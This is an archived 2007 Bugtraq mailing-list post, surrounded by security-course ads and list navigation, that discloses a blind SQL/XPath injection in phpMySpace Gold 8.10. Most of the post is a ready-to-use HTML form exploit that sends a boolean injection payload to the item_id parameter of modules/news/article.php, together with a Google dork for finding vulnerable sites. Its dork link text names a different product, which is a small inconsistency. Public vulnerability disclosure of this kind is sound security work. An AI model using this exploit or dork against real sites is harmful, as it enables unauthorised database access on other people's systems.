Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

from [john] Network Security [Permanent Link]
Subject: phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
Date: 22 Apr 2007 22:23:32 -0000 
<!--

phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit

Vulnerable Variable: item_id
Vulnerable File: modules/news/article.php
Vulnerable: phpMySpace Gold v8.10 (other versions should also be vulnerable)
Google d0rk: "Powered by phpMySpace Gold 8.10"

John Martinelli
john@martinelli.com
http://john-martinelli.com

April 22nd, 2007

!-->

<html>
<head><title>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection 
Exploit</title><body>

<center><br><br><font size=4>phpMySpace Gold (v8.10) - Blind SQL/XPath 
Injection Exploit</font><br><font size=3>discovered by <a 
href="http://john-martinelli.com";>John Martinelli</a><br><br>Google d0rk: <a 
href="http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22";>&quot;Powered
 by Ripe Website Manager&quot;</a></font><br>

<br><br>
<form action="http://www.example.com/path/modules/news/article.php"; 
method="get">
<input name="mode" type="hidden" value="0">
<input name="order" type="hidden" value="0">
<input name="item_id" size=75 value="1&quot; AND &quot;1&quot;=&quot;0">
<input type=submit value="Execute SQL Injection" class="button">
</form>

</body></html>
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit, john <=
Previous by Date:  DmCMS Shell Uploading, security
Next by Date:  Post Revolution Remote File Inclusion, InyeXion
Previous by Thread:  DmCMS Shell Uploading, security
Next by Thread:  Post Revolution Remote File Inclusion, InyeXion
Indexes:  [Date] [Thread] [Top] [All Lists]